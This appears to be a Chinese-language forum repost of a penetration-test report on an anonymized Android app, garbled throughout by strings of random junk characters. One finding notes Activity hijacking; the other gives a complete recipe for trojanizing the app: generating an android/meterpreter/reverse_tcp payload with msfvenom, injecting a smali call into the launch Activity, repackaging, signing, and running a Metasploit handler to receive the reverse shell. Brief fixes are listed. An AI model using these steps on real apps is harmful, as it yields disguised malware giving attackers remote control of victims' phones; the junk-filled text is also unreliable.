0 l$ x) p6 _" ^5 |5 |- b: b1 c ! t6 x, z$ {: k7 C1 m. p& G   4 M# g) R( H( [ J ) R4 _" x8 a1 |4 d

$ H. t( P5 M: _. q/ c% t- p: N/ h3 a$ Z* @

5 O7 P* B1 U8 e+ q( z 7 L0 K9 \& a) p6 h, @& e 1-2 测试结果 5 n F' q2 [( d4 s4 `' Z/ {" @) e

, Y% @' Y" f: ]% Y * M# o* O# O. u* s0 z t: h) M8 w

# a5 z2 Y+ \# }. P + h" @- t; u$ ^   1 z/ U V; F o/ f 5 J% R) E0 V: ~

. z" C0 i J7 J- F8 K" `, u6 [4 p' n" k( L5 R( f" u1 i

6 l2 k3 m/ @8 B3 ?* s" K! z ' i5 b+ n. T5 K4 x. s, B8 k3 Y* ^ 2 检测结果                    + P6 ~) y- P8 |6 n% ~' p8 v. W $ e$ h/ F2 H" K9 T! n) w+ ] W

) b% W! c- s" P8 e& d9 R ; L- t) e7 v: ?/ }. f

/ h1 @. t5 ?2 R5 b: z $ P) w. n7 u) T5 R* b4 ` 2.1 某某某 , q1 p! k; a% H' E4 p% W 5 g3 X' }3 [+ W9 f

# P1 w: Q+ }0 H+ ^, P 6 [7 v# M6 H% f+ i

( R) a2 I H+ ?( k- M) v- ?1 N" W ( z7 O6 ~' P% r# r8 x U) w 2.1.1检测目标 2 c7 U) |. U T9 s9 F 7 p) o0 k$ i/ `. C, K, v

7 Q. ` Q9 S- R9 Y' Y3 h4 X & w P: S* S$ ^5 ^# n* g$ m8 W

2 r, x7 K8 C1 ` 3 ?/ U Q* O+ s/ [ I+ O4 f 目标地址: 某某某某某某APP 0 p( {4 {& M0 a1 A % o. x4 R7 |# K& e* M

! g, k2 z) o+ [ " h8 `! m0 |6 Y' d6 y

- J# G: l3 [, F9 [$ N 3 b! Z8 H2 l. V 2.1.2检测结果 9 _; M0 K4 |, c # m3 i0 r" W( S1 V/ Q( v# O9 `

7 a; {, m% v: Z; | ' [2 d- ~: [( g7 X) E7 }

7 c; H" r% v* m! R: _" N 9 i% G( c3 g4 q( p3 i" N$ i+ v% E 2.1.2.1 5 o( O# M# k$ N4 @8 E( m# m0 X- s ; V% t$ _! P- j( P7 y0 W, b

- L, C( o- R) D v' E " U f0 o* I/ O) D3 a, n# Q3 N

- P7 Q" T$ Y( k+ b0 B, U " k" y8 X; ]& {$ b) j8 L 漏洞链接地址:某某某某某某APP $ Y% l2 D/ q: o Y # M g+ g! n$ \: [7 H

. q3 H. U' n$ ?" ]7 r$ B / y8 D' _2 k9 S

; T$ g) W4 i$ B8 U1 s; l5 L# ^( f! o# D) J- }* C' ^$ w   5 p ^! A/ ?: _- V6 _) s' T. j 8 d0 P& ]: D6 |8 r1 D

' B2 y$ H. q0 {; C* \ 9 m& G9 D6 \- Y: t

8 W$ ^3 P3 J% l) v - U d z8 I( \9 I& \1 C 漏洞分析及取证: & j- B9 z0 g" j( j% V) W8 V 9 k n0 H- K |/ C5 _6 C! f% ]

+ Q/ C. M: l) O0 ~3 U: t8 v+ [& ^' n5 ` |- \/ k1 _" h, S3 o

1 k0 O/ p' [: S; f. V- y1 C1 G 2 N) J# d" Y9 u! I9 H! A* ?; O                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: - Y' | \# h: ~+ ^! \5 r * l; w9 O, |# M6 Z" r/ f/ x" ]

( R* V& S4 U8 f8 R , M: ~1 t) n8 v

b) h! Q0 |# j) `# A Y R* C% m% h7 Y# `, z      : H! p! ?) `6 `+ O G0 d3 m7 Y$ ?7 i7 a9 v8 G$ F+ Q; o

1 S% G) m0 b* _( K# k/ e1 T/ Q, X7 k$ R+ |2 q. N# s5 q: g* D

- a$ r, K9 d* v M / W: \9 @% D' _) Y                       ' R6 n4 e9 a/ w! w" O0 I# I! R* @: v: w# z9 ]! c2 [8 Q

0 J- v: ^/ f: T1 ]9 N' k : {3 F7 }9 K% y+ m

7 C. D2 d1 l* V j* P( v6 r % q! r* d9 T. b. O' n7 u$ I5 r. Q . ]+ G$ @) ?* T# R9 z# |4 k . t/ F- N1 `, n S

# O& |7 `0 n0 R; r0 a T1 H" y* u1 l' p! {. ~

; M0 A+ [5 Q; x : \( A% l K$ c# L3 _ 3 m; U( @- H2 E; v3 U+ h$ }! f0 d2 v . X8 a; E4 t; C, o0 e

+ g0 V! C# ^0 _3 a9 [4 b+ x" q! V5 D# M# C, l* B# d/ W" l

. {0 Z2 u. g! D2 y% S. V% Q" M . }1 t3 s4 Y3 A' @3 f d 5 m+ L5 t1 T9 C* \ 2 N" V- b/ n( P' f% K

7 a i$ }( v+ I- {: [0 I0 G 5 n: \& |1 ?& g5 q

, c$ H' K% K% u2 l v3 t! e) e + z/ c) l2 w; o* b 漏洞危害:高 4 _6 W! N# g3 t; }; u+ p 0 t! @/ M8 M: r! |7 T- T$ X2 y

! f+ D' x/ I; h! n8 m& }$ B* @: q2 m
3 w6 {, ]7 l- Q- h) B # W' ]+ b3 N' z( [2 t5 s5 y, R 7 ?7 _. W- W3 J+ ~# o9 N, P- i" M5 C4 f2 K! d6 T6 w( R* l% V" {$ H; h& ?; N) _ s6 j7 |4 Q: N' @! @3 \( g$ Q1 w1 w1 g" n$ I H+ V, H: W% z& p* A. o# S: g' C, U3 }3 @; b; r9 U; P, x9 p3 j& [: ]% f( J' v, q8 A. l) E- D7 l7 l0 B }$ b& g5 S0 O' h: D% Y2 O1 y% N9 E0 N c) `( [" e" B8 R/ v n& Q( F" k# \4 Z" ^4 s+ Y E" E) s1 g, {* Z r' g- {8 c# l. H0 C' m Y, L' P: \. T' ^4 {# ~$ |- W; |% R3 D- C2 d) e# b) n' a7 V1 y2 ?( t. | m3 |* r1 E: x0 ]3 k, ^/ p+ s$ Q7 P' N/ r: k: l, j8 D0 c4 G9 ~4 l2 M& `. u2 V& F9 J! ^; ?+ D6 B$ ]! w! T4 E8 b, e4 a/ r6 [
' \" @/ z$ Q: p. ~ 2 W9 C: u9 G' l$ b l& N, [

) u9 c f/ i' u2 C* U" w " Z) \$ I2 z$ x 严重程度 ! `% C6 X# F& M; P3 ~- {% O 1 ~+ d( n8 n6 U4 j

+ m4 x. \5 u& a% S 0 W. S+ t, c$ w; v' u
1 e9 l0 W% p5 ? o* \" n6 A2 L3 ^: e+ N8 } ^

2 Y. F' p5 q7 f- e0 s( y , I" A$ f: u5 _8 N# E0 S. m . W4 i4 ~# Z' y- {4 c g6 P2 P( y" E E I$ l7 e* ?

+ K# |4 D* }3 W L6 m; r 4 P# ]3 ^4 @* l# z
P" W9 n5 J+ \5 E# O* t 3 W3 G+ X3 v2 I2 E* e

/ Q) `' U9 [' B, p/ c3 d# [+ A( L1 |$ {9 p) z7 _" O 2 t. ^- D+ z9 k % l. j T' O# I- k7 |3 {: a

f/ I# |; J# }2 A: l. D3 T1 s! ?
& p" i7 E# h$ q6 l) x/ t& h3 X a" F0 b* i- o0 Q

( D, V. B: `3 C' t8 f# ^7 a b' Q( P# L- H+ r & b$ @( _& ^% {* H! w7 ]4 I' Z7 N) a- r/ V2 {* D

. ?* L- D" ]7 C9 Y6 X( o$ t * l* ]9 o8 {; }! S$ Q; `* _
`8 c# K# ~- L; m& q, D9 t+ a, A5 }# z

& Z' N3 V2 z G; } & @( Z& ~3 j0 W2 J   S9 I s0 e" w2 D & H2 o* R# J+ z% |1 A9 U- B

) u- c. O- P% x" T. z+ f( S* E% u' o" h5 J8 }+ _0 D
, L$ C5 A$ e9 W ; n# C) d( T" [2 W- K. u6 k Q, C

% E" g) J$ V$ q, I! { & c" l4 \5 u% j0 \; F) o% o* v ( x6 i& R F& q( ? 5 L/ ~4 M3 \. U+ F

0 o4 Y9 t. i4 M7 ^& f. C' R3 p $ H) L) S [, @+ s4 F) k# r: T
4 z Q/ {3 R5 @7 R3 u; j- ]; Y/ t9 \( Y0 A( w

9 o6 N4 V- K2 `1 [1 K , Z' J# t: t. A7 |   9 b; V! Z; D9 t! V * e7 ]) R+ x# k0 c8 h! P3 U, M* {

$ k% r8 L' c+ A/ A & W1 ]) }" e+ n4 t0 Z5 r. L
; r& J$ A, B( H( V; H- B # F! [# B& }5 j% x) b
# {4 ?; {9 d3 H 3 h3 z1 z- v" e& z1 P

6 `9 s" t& S* a4 B* g B) X0 ~; O2 N0 ~   8 n* q8 _ v) t4 I& N) o" R7 ~" I2 V' a- e

, v9 b9 j. d/ n" ^) |8 @# n8 D * R. |: m- ~8 r2 Y( ~

N# I: H5 S/ t' Y% h/ _* }& v * V0 ~& n4 F! l* ]+ X K2 c, v 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 - X: K$ y! L. d( H- D3 W; C: Y0 A 5 H) u& e, }- d

8 m/ |- Q2 s$ X2 U2 |% e6 u 1 g! z4 M! L( }% _

" T$ {, R# m; }% X" d' q/ B B/ w2 i4 Y           }' l) ^9 P5 g8 K . J, Y8 ?2 J! S c7 J" \" S

3 b) }& F* n2 P) r" E) H/ m4 [" {/ _9 H' m0 k

5 ^* W4 \2 o, G1 G( K( f, N3 W / m6 U* x; b' ]5 Y& }) D$ ]   : Y" a, r0 B( o; [' J, X. L( [, F/ A$ B2 l

1 _8 r$ ~. O1 B 3 X/ l- X% W2 v, V: e0 A4 R

3 _; a% \5 R; E$ ] ) Z7 b- i' ~! W+ m 2.1.2.2 6 y ~9 J% y+ p8 z c; P, y3 e; C. [8 V/ V/ W$ ^ S* N

! \3 `2 ]) e+ J4 B& l5 p & E- t; ~- s4 X* `. O

6 I$ }, s- p. a7 a. n4 i 2 C; [. u, `$ S' z2 h 漏洞链接地址:某某某某某某APP " J) z" E# T1 O7 J# v3 {, @ `7 q1 c& `$ }+ Q

) _% S$ N5 q# J+ G$ |, i 6 o" E }1 } H `4 D! t$ j. Y

% H/ p: ^2 W* }. z2 u7 T7 I1 y" d$ e- a& h ~* K. S+ E% X 漏洞分析及取证: 5 W; s% V2 \1 U, _4 y/ ] 6 r2 P* q% [( `4 ]( w3 ?) o n

2 ]. h- e* b6 H O! v# d+ m( `8 r2 i6 W/ d! p6 h& E

; r9 D# Q! V! H- c1 S( y" A, h& C                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: # z( I3 Q! l: `2 a2 M6 P7 | 3 u: `% Y7 f: i1 h6 M3 s

3 B; k* m# A9 O8 R, v0 ^ 3 l" T. Y1 p( v- |" @

% x; d9 `& g3 q/ o' [/ q c 5 E4 [1 J' k& g Metasploit 生成木马 apk 7 A9 @3 Y4 b+ x( Y& z: d9 s; I* u' f' ]' L* L

6 n3 g! o0 `) k* q2 Y ( B1 K, t4 r6 J1 i! @# c5 U2 q5 H

7 C8 X- l# o' f+ S5 w% j. _ 6 q: n3 [4 p- ~( X8 `, c* B2 A) v/ s msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk $ D% \: q% ?- J0 X 0 A( E% P0 n7 |$ v. p7 V

* r8 h& ^* K$ G% G* C# d" [' l) j# U- ~& j* K% K

8 J" _0 U8 }$ F/ V' P" u S % J3 s0 N6 }9 ]1 x# v: b 反编译目标apk和木马apk 0 j9 W$ m% y6 I' n, N& m# V e0 _0 g

! e* W# `! W0 R5 A" u6 ]: u5 k$ g2 j' Q: v, P& l7 x+ V

9 Q4 k6 Z/ K" W " W& F! ?! n, b) ? apktool d target.apk
! z) ~" C' f4 _3 A$ X4 T; h ; @" R8 W1 A8 r! e/ h6 g apktool d cockhorse.apk
/ @3 D7 R, f: k7 y+ b& E0 X . M( E4 c. V) p5 ~# a

d, p0 V- {# ^2 F5 D! X y: a7 l, N5 P6 H

' @0 E" f" }; J+ i. t7 ~3 J: R3 Z$ p5 Z( P% Y$ G( P& o 木马 apk 注入目标 apk 7 k9 q/ R- n0 f2 j. K0 }7 H + r6 Q9 P' u$ B; W* @3 D

5 K: W H( k! F/ p- [# ? ) \9 V. G. h& ]& }. V+ g

* K) ?9 Z" f5 o$ y3 u ) O: q+ U& H# I3 {: S) ~ 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
" k# x, _, @' N3 w; l 7 G% m, a$ ?6 ~$ k: @2 r! a/ p5 K invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
- t& K6 D; j3 d ) o$ {3 V6 M% K+ v+ ]8 Q

; Z$ I8 {; c0 P2 k# Q; } * I0 k, g2 U; ^: Z- Z/ c l

) k( h4 c# `( Q' p 4 q. w* `2 V/ o# W 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 % X4 g+ U4 [$ O" Q& }- t# ]4 R4 P& l, J+ ?- o

4 o- f2 t: ^4 C4 M4 O2 Z / @$ M& c/ g1 l" l

: |* ?, O2 M l) u( d + w# D0 f0 H8 x( y" n3 ?, M" b, D 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ $ k& O8 q: N2 E2 N2 A- ?% H. }' n: P! B! w* l1 P4 @

# \/ ~$ p1 q6 w; @# f # X. X) p1 M" k/ p

; X. K9 N9 u a# p) Z! w 6 M0 K- J! H4 m' C& M 回编译生成最终 apk / U! l* x) t, h# F" m 1 [- T% U0 W7 @+ T! ?

1 \# s! l: q" E8 O( Z; i1 ~0 W2 R & H; G% |- T4 f z+ x6 C

% _( X% L' {0 {1 I6 q7 d& z9 q9 a! D) `/ m' z 重新打包 * e+ q$ U+ |9 { C- r2 X 9 W* `# O5 m* U* s; [

# @$ ^4 g0 k; x" u# E8 V8 F: Z N( | 8 `( u* ~6 n, N) C' @

( V/ }8 K7 U. T" a. n # i6 Q H- B9 [2 Z* A$ G" Z$ p+ p apktool b -o repackage.apk target_app_floder 9 Y3 A. E/ `& F3 I) U; i $ K: H3 H* W+ R3 }4 Z* M! a

: H+ m; S( f4 |6 U, o0 [& |' p7 Y. q; F7 Y, W- H3 C4 u

6 L, N# I% M2 t0 V5 X4 d - ~3 Y8 F/ h9 ~: f% r- D6 A 创建签名文件,有的话可忽略此步骤 6 L! i; Y6 y. M& w, I , l$ g2 V6 v) h8 ~6 A7 U

" r: f/ s4 }& F7 @8 G/ ^% {- ^" X. \" N0 c9 J' G1 U

; j3 @5 t& h1 q) G7 p2 _9 g, r$ u2 B; ?3 m keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                9 ?' ]" @" i; W1 s' D0 j * v& k2 {5 n. u) [! u

1 S! B% a$ p2 i' s, Z) U 8 p/ P: [1 z1 m

5 r+ J% j. G, Z . |. @4 D! p: F/ c i4 Y 签名,以下任选其一 7 {/ q+ x4 s; r* l! g$ F1 }. Z, A! p. D. M: b% s. N

8 w1 `, B, c- s* E0 {: M0 ?5 ?4 E8 K* i) ^0 [

a/ s2 }3 M* v, h. p # N& ?# m2 x" M; A' d, d jarsigner 方式 . a6 g3 J$ \9 F; r* y1 V [ m2 K* P

3 l. a, P }# q0 L5 [+ ?- y " S- z2 d# T; r! V

2 o' i4 y) K, H. I! L2 |% x& L' w5 n: z" o' y jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 4 l8 S" t) a+ U4 B# u0 R " n, q6 r1 d# f* t6 \+ U/ m a* f

/ h) c* c7 S8 f" P% z s $ j1 z) q- H' ~9 H2 L3 w5 J! l

0 o. x9 I M/ T5 B3 ~# u$ N ; W2 B! t$ h/ B; c6 E. V( }4 n0 \ apksigner 方式 7 J: g$ h. Q, b2 E ! w. ]; H( v3 M& d, q- m

; f6 t/ ]9 b* `8 }# b4 I+ b * R Z6 O0 B& `$ Q% G6 S5 w: M

+ j2 P0 p. p0 M k' m9 Q! D* L6 M0 n) c9 l/ L& n: s: p1 r7 r apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk # t1 p! X* C' X I+ n" C / b( {( l! i$ S2 o( a

Z) m! j5 p! E3 N . w7 c: P6 |/ }) c7 G; J, P1 i

. h0 B S. C1 P( B/ C; g & O* b: @+ H, {, W* t T9 Z 如需要禁用 v2签名 添加选项--v2-signing-enabled false 9 `: A2 e! K- P8 T2 Q * y" j8 N+ p& N8 ]

. }$ L: }/ H0 Y h; ]8 a$ e [/ L" n z$ C

/ B# _, g. X. ]. s( C , o* b9 i7 R9 _9 p9 g 验证,以下任选其一 ; I; y2 ^7 F; B1 g 3 ]4 o; }- p& j7 Y( K& H

+ l" i. X& s" O9 x; F6 N, u6 s # _6 g: {) Y/ n4 c/ ^. x4 p

3 ~4 k+ n: k2 } + t1 v0 Q8 `8 E/ v: [2 g6 @ jarsigner方式 6 s2 Q' @- B# ]# d# ]. I * n' Q0 S! P0 `/ z- c# {

; O% U5 I# e& H5 Y ^& a % Y9 v- ?: J0 x6 _

& ]! M+ N' r) c4 B$ _7 {1 t( S1 Z " o( Q6 F& v. @& X& s0 h# V: X jarsigner -verify repackaged.apk * j/ ~5 l3 M U; i, s, w R 4 M* z) H3 s- h3 ~

3 [; _2 c( I Q1 k9 R) w# Q% d! W" j! a3 j

; Y6 g" ~0 Q( k$ Y * L) D$ i) g0 a apksigner 方式 }6 p8 n( B1 ]5 p5 f' y0 K/ u7 z) `9 C) \1 K0 V$ J% l3 E- E

5 m6 _8 U7 f o . o9 Q' _, H/ w

# q4 X" t) }3 l J ) L; N8 I0 y6 u2 ^+ {: Z: @ apksigner verify -v --print-certs repackaged.apk ( M6 i* r2 o, n Y: m# X , i3 z1 A9 \" _7 _6 j

7 ~# e7 u. W5 a3 U( q6 u! w5 H- n5 j y P7 D

* Q* e3 M1 }4 ]6 C P# Z3 ~) s, {1 T8 K$ O; V/ q( Y keytool方式 # F* l" y8 { c) ]' A( V6 d2 g4 A1 I% ^

' ]% F8 b" m# d2 K ! H6 s$ Q6 W& S! c8 y" T

" O. w# z4 r, \* [3 d$ \ 9 j1 W9 V9 ]( S keytool -printcert -jarfile repackaged.apk / C8 C* g5 F5 [5 S* y8 s0 y7 Q: d1 r% t' r) u

1 b% P" Y6 c8 t 4 S$ K" R% i; U2 P( X8 I3 Q

6 L+ ~# B4 @0 F " t O. f, {6 E" c" p B 对齐 - k0 Z4 p" ]' p: j( S) u( v, x: b' ?4 V( }" l

4 W* e; x$ S8 M; \2 T " U i0 J. {0 F2 c

F4 m: U. A9 S3 M$ ], X! v4 R9 N1 u; O4 T+ v" C3 A 字节对齐优化 ! u. _. V* {! q/ @# r) u: Q ) K/ \# ]/ e' c1 K

5 E' }* m8 ? W+ v+ J9 [: G* c 5 a% q% B4 H8 Z2 R5 t! W

& v: a) V$ [9 o$ T7 F 7 `4 f; y4 ^7 t zipalign -v 4 repackaged.apk final.apk 4 `. Z6 a- _3 Y3 M! B' D- R3 N3 }6 h+ D6 \+ Y9 d& q

9 o/ S7 x- {' o - B" ~+ F$ }$ ]; l- p1 r

0 f, ?- u5 ^2 i& O- K7 W9 O7 H% Q. s2 r1 f$ i 检查是否对齐 " j0 f' Y4 ]' O2 p' H7 V& N0 T) O! j0 P7 t

5 w) j' I: ~" L- ~2 J( E 4 }- A; B! U/ Q$ e5 b2 b1 N) q

# k2 c1 I+ K3 S' L( F7 n) g7 ?" Q" k* e3 h" c ^5 ] zipalign -c -v 4 final.apk : D8 Y- @ g' h) V C2 d / N( l( ?3 f2 }& t: o; U- i' r: B

9 N* i9 F( |, z0 @ 0 n3 X% U* G# w

6 Z) m/ v( u f) b! l7 u : q$ G; C5 ]: {8 m5 X; V* q/ m* d 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 0 L5 Y2 {" J7 D! Q G& }6 K- b1 u & a" C+ z2 n5 V( d

- n4 h' w" o9 v ( |8 p" ]( @7 B5 t! `! e/ I- `

( ~3 _/ A1 H: }$ r% f6 `& C0 F- f 启动Metasploit控制台,配置参数等待上线 5 Z- C' V0 N* u; k( j. i . g! d2 `4 i' g- S5 ^/ a

! a7 N6 {" k& ] 9 U5 W1 E' F) X k( p5 T

1 Q& r( w6 D% p- O 3 Z. r) S6 Y) R0 @5 [) X 在终端依次输入如下命令 7 x% k: g% W8 a) s3 C8 @ & l8 L* h3 \& ?1 i- \

& L2 c$ Q! |/ k2 j & H) U/ O/ ]1 s5 _. m

7 N. J; j+ p0 L' a/ i7 F ) y4 ` P/ Z! @7 @% P1 g* r msfconsole 6 E* Z! _$ F4 F! j% e4 W 9 v, \' G8 O5 @7 L3 K8 p8 F

4 @, J$ m) @5 u( I0 X( Y& |& I$ A/ @ ! n; u3 C% \/ Q

; h1 C& v) W' R; J( s' d - n" u4 t2 O$ F& z# L; v use exploit/multi/handler ( }! W: Q' h# r7 _+ s& B+ g ( O1 A1 V9 H- i2 p7 `

7 h. @4 B6 ]! `1 M( p, E$ M2 h' ]$ Q" T x2 k

& y k( t" `$ m) w, \# Y 4 m+ x9 R8 U K- ^: a set PAYLOAD android/meterpreter/reverse_tcp 3 [) C% T& s2 Z% B9 }5 h M( l & T$ y; [! N7 v% f1 x5 H3 z

7 Q* w) b' l$ Q' d ' ^* d' |6 g/ D* Z* ~* `

/ Z- p; Q" Y0 X6 V" q " V* I2 Z3 [7 Q set LHOST 192.xxx.xx.xx + B- H" }' ~! g - {9 u5 u" V5 m# I8 r

# E z" k' n5 S! {& Y8 H% T + G2 {1 U l) }( g" X! s

; _3 `7 S$ s a+ Q8 { 2 R: ~: ^% B) i- q5 m/ T set LPORT 4444 1 O ^7 r. L3 R7 W * t+ \6 C; w7 e% l

% s" e8 E; B0 ?$ p/ q ) U1 K1 |- j+ w/ J+ n7 h/ {! V

2 g l8 R; E4 L' i 1 C z4 ?2 K' l, f V exploit 0 g3 l8 b% n* ] / Q. ?' W) ?9 @: c5 j% F

* P! z# j T3 N. d( }0 q* ] _2 k

3 ?7 I& A: l. {. { ) E- J1 r7 v2 I3 { 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               " H+ ?; B% v/ r/ E' \! m% ~4 f5 ~0 b; H: D8 K3 j) w- ^

; M; j9 Z% z* ]" A& y1 A/ Y u - z, T+ T% ~6 r

r2 L1 m- ]: C! V# y/ K; y8 g) t* O7 g, ^ 漏洞危害:中 4 x* M( e3 D7 z6 D, r; q0 {* Q6 R# V: e6 {, a5 N) W

' a1 r- }7 ~5 }# d* Q7 a4 J# m& ?/ r$ u, b
G% ~1 q; S( @& z1 L& v7 } . n& c' v5 e$ J' x " [2 T* B/ L; x$ I* u0 ]0 J X& ]) @% Z) G# i3 Q5 W7 ~2 R7 i* f! U' E * Z0 S$ j9 a" R$ [- S) M! C n K u6 Q W/ E5 S! V# Y4 X# ?3 ^& ~: i1 D1 B; `. R |! q& x$ A& L& }8 ] p- W. V$ F7 `6 B3 {/ F0 {: Q( p( S( \8 Z5 M) T7 u2 k$ ~- n4 D* }% n6 L/ r* c s2 ]. R4 K$ n4 z$ `3 I) m$ o4 n8 Y* ]1 x4 Y' c6 z* z1 S4 `+ [& s. Z: H! X' ~" V- Z B" p5 T( ]- a( [8 x; R/ h1 h3 y/ C& k# \ r& j, W# H6 z. q7 e) n8 F& h. b$ ~ A. c. W& g6 H2 F+ Y9 R! C& y8 v4 H8 Y5 z% K7 S, ~. S6 r# F% x5 A6 H4 [7 ]& c p \1 k, H1 B; ]/ n; F+ b" ?3 R% a: i/ [/ D6 C, n% ]4 p, O* u; ~2 Q y8 s' g: D7 R# k+ [( t% [% d G. h- h# X. u% ?6 N4 m% E3 F* f+ w- u) I
+ _/ p7 x0 f' Y. I% ~" t0 h6 M/ ? * D6 p; S# v6 V" Z

1 @3 n1 M$ V: J ( p; @ _1 l, _0 Z1 t0 d4 ~ 严重程度 3 g8 T$ ]$ z+ e3 ~6 T* M. _ + A8 T% U9 _1 d, w

+ S0 u0 d4 z# e8 E( \2 [ 6 K }; j, L1 g9 u) x
% o9 ]- X7 K; H$ t! [4 @- J( d, |5 M1 a* `2 [" {) J3 D1 a

, k X$ _4 P% L$ S, K" ?% E4 m" `4 t' N) h6 m ( w! {, ]4 [* L3 H$ e' E( N+ z* N8 G2 H. x

1 D5 l3 h+ Z+ n, M0 a 5 D+ v, \( F+ g: X8 g5 b, c1 w
! G0 `9 r3 U' r" j, s( G0 y5 z* G. R( Q" d; Q' d! M$ B

5 r7 g( E5 `3 ?9 m * s- Z5 D; H1 L% ]0 ~# L " e3 b! z/ D) _* M3 L- o ( [3 i. k3 x, P

7 ^* \3 r+ B M 1 S6 l9 W; V+ {* [) J' }; w
! b; }& L; X6 Q( M) Y; y , X3 r7 H5 u9 J

' j$ a. ^3 ]6 H) [5 E% E4 G. M, c. } + l' t. o6 S3 ~$ ~9 C/ L4 ? ' h6 {# R+ I9 i

, ?* e" X+ A" [8 ?' \' ^; c* G# k2 M1 u) T9 N$ C
5 A6 T0 Q* q, t* i) b" z 8 F/ @& Z. H6 Z : I$ G ~0 `7 {7 d [ - I8 U2 V9 ]$ H* _( M; ~4 h8 {7 d

+ Y* E% \4 {/ p8 x. B# f# G+ D 6 _0 p' q1 ]: n   ( x* k5 F5 g6 d v) e2 m- y/ q( t* c0 ]

' m4 @9 ?: f$ d$ v) n4 r l1 l7 u e% }- u) G' I3 H
1 P# l0 e: x2 V( y8 Z. e; m& u 4 l' C( O4 ?% b9 I+ M, w2 i

% u7 J" Q( X: K3 j3 r1 @ & n: i t0 L. f" A6 O$ ?( r( ^0 ?. r+ ? 1 k) ?# @. {1 q& q$ t/ ` 6 c/ p" H' w% }# m

' E' Z- R6 b! P8 b! A1 c ' P; B7 ]3 P, P8 W6 `: ^2 ^
8 Q- i$ }, o5 F! |! S/ {: K8 D( t0 u/ u$ O 3 K. g' g+ q# Y* I1 H3 N6 Y3 o& C# s+ C! m

; T& P" Q$ r7 _0 X- K3 l: H$ D 9 v# U9 [ @, ?2 j. ]   6 x9 @/ p1 q& F0 z ; d* [2 K8 F5 Y1 H4 U- @2 O

# |3 K, v# E! n) B W " G' W% S: S+ r6 b+ B, R+ Q! z
' K- [3 _/ L; E/ s1 S& W+ o: g5 b$ d) a+ _4 q7 O
+ e- @4 q& U) q6 F3 @. J: c& I6 l) V& U& e

: X( Q7 |/ h+ x2 }9 o9 [& E3 ]9 T- t! w8 P- N$ R6 ~ }   " ]- A0 `2 Y! O Z; c4 t% A- R; F. J$ Q

# h5 v2 G0 H3 S# } ! f8 ~# [7 u3 E7 l- `

* N/ u& n9 o& A6 H, X4 b6 m9 \- I ! V) _' i' u8 r# h 修复方法: 3 f. X4 T" _" |9 E$ _% [' p; c% \ 0 L& e# A' w# f. d! v1 Q$ T! j

# F) x1 j( y& }1 w( V & H3 ]( n% Q8 G2 u7 F, G0 n3 r

" }) V v6 y' e2 U / t# X) _% i! B6 `               1. APP 启动时应做签名校验防止二次打包。
! C1 d% z) Q) W8 T6 G# o9 V6 C7 v/ n 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 2 ~ B/ I: D; X, q , |/ P4 k3 M% l% t

) d; {/ P3 ~& Q) R: a+ J6 Z0 B - A7 i" t# U* |5 H7 c1 I # R; E2 d& d6 M& J* d u9 H& b& j: Y: y& }( Q _6 @, Z% |

8 N! D: Z/ |# \ C1 Y+ z0 p& X, ~, n& W" I' Q2 u" y   6 a! s' |8 ^5 s1 N, { 5 Y; o& T8 H, s2 X2 J3 f) v. W

: |2 `# I1 d& @1 \/ N( T/ x# \ 0 D4 n& g7 ?" E 5 |7 {, V# q' u. q4 i" |5 o b- M/ N 1 M4 a5 ]' N' B' k& j1 i! d+ |' g

! U! O& n, I( c) y9 z3 O P3 i2 u( [2 J* x
) d- Q' X% q. o8 F+ R7 O 3 [1 d k7 a% P5 U. j* b( n

1 L+ `( z" R: Y $ V @7 l& e7 I' \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表